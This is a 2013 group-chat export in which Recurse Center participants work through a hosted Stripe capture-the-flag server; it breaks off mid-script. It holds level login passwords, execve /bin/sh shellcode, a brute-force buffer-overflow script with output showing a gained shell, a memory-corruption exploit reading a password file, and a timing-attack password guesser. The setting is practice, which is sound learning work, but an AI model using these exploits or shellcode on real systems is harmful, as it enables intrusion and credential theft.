{
    "anchor": 0,
    "found_anchor": false,
    "found_newest": true,
    "found_oldest": true,
    "history_limited": false,
    "messages": [
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p>Host: <a href=\"http://stripe.fezrev.com\" target=\"_blank\" title=\"http://stripe.fezrev.com\">stripe.fezrev.com</a></p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6698849,
            "is_me_message": false,
            "last_edit_timestamp": 1370958192,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "Info",
            "submessages": [],
            "timestamp": 1370894454,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6698850,
            "is_me_message": false,
            "last_edit_timestamp": 1370974030,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "Info",
            "submessages": [],
            "timestamp": 1370894464,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p>&lt;User&gt;:&lt;Password&gt;</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6698914,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "Info",
            "submessages": [],
            "timestamp": 1370894611,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p><code>level01:FdMywAhh5gif</code></p>\n<p><code>$ ssh level01@stripe.fezrev.com</code> and the password is <code>FdMywAhh5gif</code>.</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6698938,
            "is_me_message": false,
            "last_edit_timestamp": 1370957412,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "Info",
            "submessages": [],
            "timestamp": 1370894645,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p>Good luck!</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6699842,
            "is_me_message": false,
            "last_edit_timestamp": 1370958218,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "Info",
            "submessages": [],
            "timestamp": 1370896398,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<p>yypX2vaMoVDJ</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6700218,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "Info",
            "submessages": [],
            "timestamp": 1370897103,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p>@all <a href=\"https://picoctf.com/learn#colROP\" target=\"_blank\" title=\"https://picoctf.com/learn#colROP\">https://picoctf.com/learn#colROP</a></p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6701132,
            "is_me_message": false,
            "last_edit_timestamp": 1370958174,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "Learn",
            "submessages": [],
            "timestamp": 1370898716,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/0f54d6b36e7d83288a5f02d33bafa014?d=identicon&version=1",
            "client": "website",
            "content": "<p><a href=\"http://dspace.mit.edu/bitstream/handle/1721.1/5753/AIM-443.pdf\" target=\"_blank\" title=\"http://dspace.mit.edu/bitstream/handle/1721.1/5753/AIM-443.pdf\">http://dspace.mit.edu/bitstream/handle/1721.1/5753/AIM-443.pdf</a></p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6702891,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "pirata@gmail.com",
            "sender_full_name": "Javier Ernesto Olaechea (S'13)",
            "sender_id": 2157,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1370901957,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6725275,
            "is_me_message": false,
            "last_edit_timestamp": 1370973996,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "Passwords",
            "submessages": [],
            "timestamp": 1370957304,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<p>A very complex program for a simple problem</p>\n<div class=\"codehilite\"><pre><span class=\"kn\">import</span> <span class=\"nn\">sys</span>\n<span class=\"kn\">import</span> <span class=\"nn\">subprocess</span>\n\n<span class=\"n\">cmd</span> <span class=\"o\">=</span> <span class=\"n\">sys</span><span class=\"o\">.</span><span class=\"n\">argv</span><span class=\"p\">[</span><span class=\"mi\">1</span><span class=\"p\">]</span> <span class=\"k\">if</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">sys</span><span class=\"o\">.</span><span class=\"n\">argv</span><span class=\"p\">)</span> <span class=\"o\">==</span> <span class=\"mi\">2</span> <span class=\"k\">else</span> <span class=\"s\">&#39;cat /home/level04/.password&#39;</span>\n\n<span class=\"n\">lvl3</span> <span class=\"o\">=</span> <span class=\"s\">&#39;/levels/level03&#39;</span>\n<span class=\"n\">mem</span> <span class=\"o\">=</span> <span class=\"s\">&#39;</span><span class=\"se\">\\x5b\\x87\\x04\\x08</span><span class=\"s\">&#39;</span>\n\n<span class=\"n\">nspaces</span> <span class=\"o\">=</span> <span class=\"mi\">4</span> <span class=\"o\">-</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">cmd</span><span class=\"p\">)</span> <span class=\"o\">%</span> <span class=\"mi\">4</span>\n<span class=\"n\">sep</span> <span class=\"o\">=</span> <span class=\"n\">sep</span> <span class=\"o\">=</span> <span class=\"s\">&#39; &#39;</span> <span class=\"o\">*</span> <span class=\"n\">nspaces</span> <span class=\"k\">if</span> <span class=\"n\">nspaces</span> <span class=\"o\">&gt;</span> <span class=\"mi\">0</span> <span class=\"k\">else</span> <span class=\"s\">&#39;&#39;</span>\n<span class=\"n\">expl</span> <span class=\"o\">=</span> <span class=\"n\">sep</span><span class=\"o\">.</span><span class=\"n\">join</span><span class=\"p\">((</span><span class=\"n\">cmd</span><span class=\"p\">,</span> <span class=\"n\">mem</span><span class=\"p\">))</span>\n\n<span class=\"k\">for</span> <span class=\"n\">i</span> <span class=\"ow\">in</span> <span class=\"nb\">xrange</span><span class=\"p\">(</span><span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"mi\">10000</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">):</span>\n    <span class=\"n\">args</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">lvl3</span><span class=\"p\">,</span> <span class=\"nb\">str</span><span class=\"p\">(</span><span class=\"n\">i</span><span class=\"p\">),</span> <span class=\"n\">expl</span><span class=\"p\">)</span>\n    <span class=\"n\">proc</span> <span class=\"o\">=</span> <span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">Popen</span><span class=\"p\">(</span><span class=\"n\">args</span><span class=\"p\">,</span> <span class=\"n\">stdout</span><span class=\"o\">=</span><span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">PIPE</span><span class=\"p\">)</span>\n    <span class=\"n\">stdout</span><span class=\"p\">,</span> <span class=\"n\">_</span> <span class=\"o\">=</span> <span class=\"n\">proc</span><span class=\"o\">.</span><span class=\"n\">communicate</span><span class=\"p\">()</span>\n    <span class=\"k\">if</span> <span class=\"n\">proc</span><span class=\"o\">.</span><span class=\"n\">returncode</span> <span class=\"o\">==</span> <span class=\"mi\">0</span><span class=\"p\">:</span>\n        <span class=\"k\">print</span> <span class=\"n\">stdout</span>\n        <span class=\"k\">break</span>\n</pre></div>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6734654,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1370975908,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p>@<strong>Pedro Moura</strong>: <a href=\"https://picoctf.com/\" target=\"_blank\" title=\"https://picoctf.com/\">https://picoctf.com/</a></p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6734844,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1370976324,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<p><a href=\"http://www.offensive-security.com/metasploit-unleashed/Msfencode\" target=\"_blank\" title=\"http://www.offensive-security.com/metasploit-unleashed/Msfencode\">http://www.offensive-security.com/metasploit-unleashed/Msfencode</a></p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6737788,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "level04",
            "submessages": [],
            "timestamp": 1370981545,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://zulip-avatars.s3.amazonaws.com/13/25c757374a8b2263be076c1e1b5281e5c4de7eca?x=x&version=1",
            "client": "website",
            "content": "<p>Oh hey, if you guys want some extra CTF style problems, a friend of mine did a reverse engineering workshop a little while back and I have the files from that workshop still. I can upload them to github if you'd like.</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6775171,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "alisa.palson@gmail.com",
            "sender_full_name": "Alisa Palson (S'13)",
            "sender_id": 2127,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371065525,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://zulip-avatars.s3.amazonaws.com/13/25c757374a8b2263be076c1e1b5281e5c4de7eca?x=x&version=1",
            "client": "website",
            "content": "<p><a href=\"https://github.com/altf4/binrev-101\" target=\"_blank\" title=\"https://github.com/altf4/binrev-101\">https://github.com/altf4/binrev-101</a></p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6775208,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "alisa.palson@gmail.com",
            "sender_full_name": "Alisa Palson (S'13)",
            "sender_id": 2127,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371065578,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://zulip-avatars.s3.amazonaws.com/13/25c757374a8b2263be076c1e1b5281e5c4de7eca?x=x&version=1",
            "client": "website",
            "content": "<p>in the notes section, there are hints to get to the key.</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6775227,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "alisa.palson@gmail.com",
            "sender_full_name": "Alisa Palson (S'13)",
            "sender_id": 2127,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371065634,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p>Thanks @<strong>Alisa Palson</strong>! I think we'll try them out later this week or next week.</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6775930,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371066978,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<p>@<strong>Muhaimin Ahsan</strong> can you reset the <a href=\"http://stripe.fezrev.com\" target=\"_blank\" title=\"http://stripe.fezrev.com\">stripe.fezrev.com</a> passwords?</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6777567,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371069892,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p>@<strong>Paolo Moretti</strong>: What happened?</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6777574,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371069919,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/e91990a05dae45146efabc2920ea4e98?d=identicon&version=1",
            "client": "website",
            "content": "<p>\"\\x31\\xc0\\x50\\x68\\x6e\\x2f\\x73\\x68\"</p>\n<p>\"\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x99\"</p>\n<p>\"\\x52\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6778994,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "recurse@fezrev.com",
            "sender_full_name": "Muhaimin Ahsan (S'13)",
            "sender_id": 2135,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371072337,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<p>shellcode = '\\x6a\\x0b\\x58\\x99\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\xcd\\x80'</p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6779002,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371072361,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<div class=\"codehilite\"><pre>Trying offset 1056 and retaddr 8048564\nTrying offset 1056 and retaddr 8048565\nTrying offset 1056 and retaddr 8048566\nTrying offset 1056 and retaddr 8048567\nTrying offset 1056 and retaddr 8048568\nTrying offset 1056 and retaddr 8048569\nTrying offset 1056 and retaddr 804856a\nTrying offset 1056 and retaddr 804856b\nTrying offset 1056 and retaddr 804856c\nTrying offset 1056 and retaddr 804856d\nTrying offset 1056 and retaddr 804856e\nTrying offset 1056 and retaddr 804856f\n$ whoami\nlevel05\n$\n</pre></div>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6780076,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371074193,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<p>Here's the source code of this crazy brute force buffer overflow:</p>\n<div class=\"codehilite\"><pre><span class=\"kn\">import</span> <span class=\"nn\">subprocess</span>\n<span class=\"kn\">import</span> <span class=\"nn\">struct</span>\n\n<span class=\"n\">shellcode</span> <span class=\"o\">=</span> <span class=\"s\">&#39;</span><span class=\"se\">\\x6a\\x0b\\x58\\x99\\x52\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x31\\xc9\\xcd\\x80</span><span class=\"s\">&#39;</span>\n<span class=\"n\">lvl</span> <span class=\"o\">=</span> <span class=\"s\">&#39;/levels/level04&#39;</span>\n\n<span class=\"k\">for</span> <span class=\"n\">offset</span> <span class=\"ow\">in</span> <span class=\"nb\">xrange</span><span class=\"p\">(</span><span class=\"mi\">1500</span><span class=\"p\">,</span> <span class=\"mi\">0</span><span class=\"p\">,</span> <span class=\"o\">-</span><span class=\"mi\">1</span><span class=\"p\">):</span>\n    <span class=\"k\">for</span> <span class=\"n\">hexretaddr</span> <span class=\"ow\">in</span> <span class=\"nb\">xrange</span><span class=\"p\">(</span><span class=\"mh\">0x8048328</span><span class=\"p\">,</span> <span class=\"mh\">0x80485a7</span><span class=\"p\">):</span>\n        <span class=\"k\">print</span> <span class=\"s\">&quot;Trying offset {0} and retaddr {1:x}&quot;</span><span class=\"o\">.</span><span class=\"n\">format</span><span class=\"p\">(</span><span class=\"n\">offset</span><span class=\"p\">,</span> <span class=\"n\">hexretaddr</span><span class=\"p\">)</span>\n        <span class=\"n\">leretaddr</span> <span class=\"o\">=</span> <span class=\"n\">struct</span><span class=\"o\">.</span><span class=\"n\">pack</span><span class=\"p\">(</span><span class=\"s\">&#39;&lt;I&#39;</span><span class=\"p\">,</span> <span class=\"n\">hexretaddr</span><span class=\"p\">)</span> <span class=\"o\">*</span> <span class=\"mi\">5</span>\n        <span class=\"n\">nopsled</span> <span class=\"o\">=</span> <span class=\"s\">&#39;</span><span class=\"se\">\\x90</span><span class=\"s\">&#39;</span> <span class=\"o\">*</span> <span class=\"p\">(</span><span class=\"n\">offset</span> <span class=\"o\">-</span> <span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">shellcode</span><span class=\"p\">)</span> <span class=\"o\">-</span><span class=\"nb\">len</span><span class=\"p\">(</span><span class=\"n\">leretaddr</span><span class=\"p\">))</span>\n        <span class=\"n\">expl</span> <span class=\"o\">=</span> <span class=\"s\">&#39;&#39;</span><span class=\"o\">.</span><span class=\"n\">join</span><span class=\"p\">((</span><span class=\"n\">nopsled</span><span class=\"p\">,</span> <span class=\"n\">shellcode</span><span class=\"p\">,</span> <span class=\"n\">leretaddr</span><span class=\"p\">))</span>\n        <span class=\"n\">args</span> <span class=\"o\">=</span> <span class=\"p\">(</span><span class=\"n\">lvl</span><span class=\"p\">,</span> <span class=\"n\">expl</span><span class=\"p\">)</span>\n        <span class=\"k\">try</span><span class=\"p\">:</span>\n            <span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">call</span><span class=\"p\">(</span><span class=\"n\">args</span><span class=\"p\">)</span>\n        <span class=\"k\">except</span> <span class=\"ne\">TypeError</span><span class=\"p\">:</span>\n            <span class=\"k\">pass</span>\n</pre></div>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6780132,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371074293,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<p><a href=\"http://michael-rushanan.blogspot.com/2012/10/why-python-pickle-is-insecure.html\" target=\"_blank\" title=\"http://michael-rushanan.blogspot.com/2012/10/why-python-pickle-is-insecure.html\">http://michael-rushanan.blogspot.com/2012/10/why-python-pickle-is-insecure.html</a></p>",
            "content_type": "text/html",
            "display_recipient": "stripe ctf",
            "flags": [
                "read",
                "historical"
            ],
            "id": 6781515,
            "is_me_message": false,
            "reactions": [],
            "recipient_id": 22759,
            "sender_email": "paolo.moretti85@gmail.com",
            "sender_full_name": "Paolo Moretti (S'13)",
            "sender_id": 2114,
            "sender_realm_str": "recurse",
            "stream_id": 20352,
            "subject": "(no subject)",
            "submessages": [],
            "timestamp": 1371077105,
            "topic_links": [],
            "type": "stream"
        },
        {
            "avatar_url": "https://secure.gravatar.com/avatar/727381701627014419ca0b85a84c6ae7?d=identicon&version=1",
            "client": "website",
            "content": "<div class=\"codehilite\"><pre><span class=\"c\">#!/usr/bin/env python</span>\n<span class=\"kn\">import</span> <span class=\"nn\">collections</span>\n<span class=\"kn\">import</span> <span class=\"nn\">operator</span>\n<span class=\"kn\">import</span> <span class=\"nn\">subprocess</span>\n<span class=\"kn\">import</span> <span class=\"nn\">string</span>\n<span class=\"kn\">import</span> <span class=\"nn\">time</span>\n\n<span class=\"n\">PROC</span> <span class=\"o\">=</span> <span class=\"s\">&#39;/levels/level06&#39;</span>\n<span class=\"n\">PWD_FILE</span> <span class=\"o\">=</span> <span class=\"s\">&#39;/home/the-flag/.password&#39;</span>\n\n<span class=\"n\">CHARS</span> <span class=\"o\">=</span> <span class=\"n\">string</span><span class=\"o\">.</span><span class=\"n\">letters</span> <span class=\"o\">+</span> <span class=\"n\">string</span><span class=\"o\">.</span><span class=\"n\">digits</span>\n\n<span class=\"k\">def</span> <span class=\"nf\">get_time</span><span class=\"p\">(</span><span class=\"n\">pwd</span><span class=\"p\">):</span>\n    <span class=\"n\">pwd</span> <span class=\"o\">=</span> <span class=\"n\">pwd</span> <span class=\"o\">+</span> <span class=\"s\">&#39;$&#39;</span>\n    <span class=\"n\">process</span> <span class=\"o\">=</span> <span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">Popen</span><span class=\"p\">(</span>\n        <span class=\"p\">(</span><span class=\"n\">PROC</span><span class=\"p\">,</span> <span class=\"n\">PWD_FILE</span><span class=\"p\">,</span> <span class=\"n\">pwd</span><span class=\"p\">),</span> <span class=\"n\">stdout</span><span class=\"o\">=</span><span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">PIPE</span><span class=\"p\">,</span> <span class=\"n\">stderr</span><span class=\"o\">=</span><span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">PIPE</span><span class=\"p\">)</span>\n\n    <span class=\"n\">total_microseconds</span> <span class=\"o\">=</span> <span class=\"mi\">0</span>\n\n    <span class=\"k\">while</span> <span class=\"bp\">True</span><span class=\"p\">:</span>\n        <span class=\"n\">start_time</span> <span class=\"o\">=</span> <span class=\"n\">time</span><span class=\"o\">.</span><span class=\"n\">time</span><span class=\"p\">()</span>\n        <span class=\"n\">char</span> <span class=\"o\">=</span> <span class=\"n\">process</span><span class=\"o\">.</span><span class=\"n\">stderr</span><span class=\"o\">.</span><span class=\"n\">read</span><span class=\"p\">(</span><span class=\"mi\">1</span><span class=\"p\">)</span>\n        <span class=\"n\">elapsed_time</span> <span class=\"o\">=</span> <span class=\"n\">time</span><span class=\"o\">.</span><span class=\"n\">time</span><span class=\"p\">()</span> <span class=\"o\">-</span> <span class=\"n\">start_time</span>\n        <span class=\"n\">elapsed_microseconds</span> <span class=\"o\">=</span> <span class=\"nb\">round</span><span class=\"p\">(</span><span class=\"n\">elapsed_time</span> <span class=\"o\">*</span> <span class=\"mi\">10</span><span class=\"o\">**</span><span class=\"mi\">6</span><span class=\"p\">)</span>\n\n        <span class=\"k\">if</span> <span class=\"n\">char</span> <span class=\"o\">==</span> <span class=\"s\">&#39;&#39;</span><span class=\"p\">:</span> <span class=\"c\">#and process.poll() is None:</span>\n            <span class=\"k\">break</span>\n        <span class=\"k\">if</span> <span class=\"n\">char</span> <span class=\"o\">==</span> <span class=\"s\">&#39;.&#39;</span><span class=\"p\">:</span>\n            <span class=\"n\">total_microseconds</span>  <span class=\"o\">+=</span> <span class=\"n\">elapsed_microseconds</span>\n\n    <span class=\"k\">return</span> <span class=\"n\">total_microseconds</span>\n\n<span class=\"k\">def</span> <span class=\"nf\">is_password_correct</span><span class=\"p\">(</span><span class=\"n\">pwd</span><span class=\"p\">):</span>\n    <span class=\"n\">process</span> <span class=\"o\">=</span> <span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">Popen</span><span class=\"p\">(</span>\n        <span class=\"p\">(</span><span class=\"n\">PROC</span><span class=\"p\">,</span> <span class=\"n\">PWD_FILE</span><span class=\"p\">,</span> <span class=\"n\">pwd</span><span class=\"p\">),</span> <span class=\"n\">stdout</span><span class=\"o\">=</span><span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">PIPE</span><span class=\"p\">,</span> <span class=\"n\">stderr</span><span class=\"o\">=</span><span class=\"n\">subprocess</span><span class=\"o\">.</span><span class=\"n\">PIPE</span><span class=\"p\">)</span>\n\n    <span class=\"n\">stdout</span><span class=\"p\">,</span> <span class=\"n\">_</span> <span class=\"o\">=</span> <span class=\"n\">process</span><span class=\"o\">.</span><span class=\"n\">communicate</span><span class=\"p\">(</span><span class=\"nb\">input</span><span class=\"o\">=</span><span class=\"s\">&#39;</span><span class=\"se\">\\n</span><span class=\"s\">&#39;</span><span class=\"p\">)</span>\n\n    <span class=\"k\">return</span> <span class=\"s\">&quot;Ha ha, your password is incorrect&quot;</span> <span class=\"ow\">not</span> <span class=\"ow\">in</span> <span class=\"n\">stdout</span>\n\n<span class=\"k\">def</span> <span class=\"nf\">guess_password</span><span 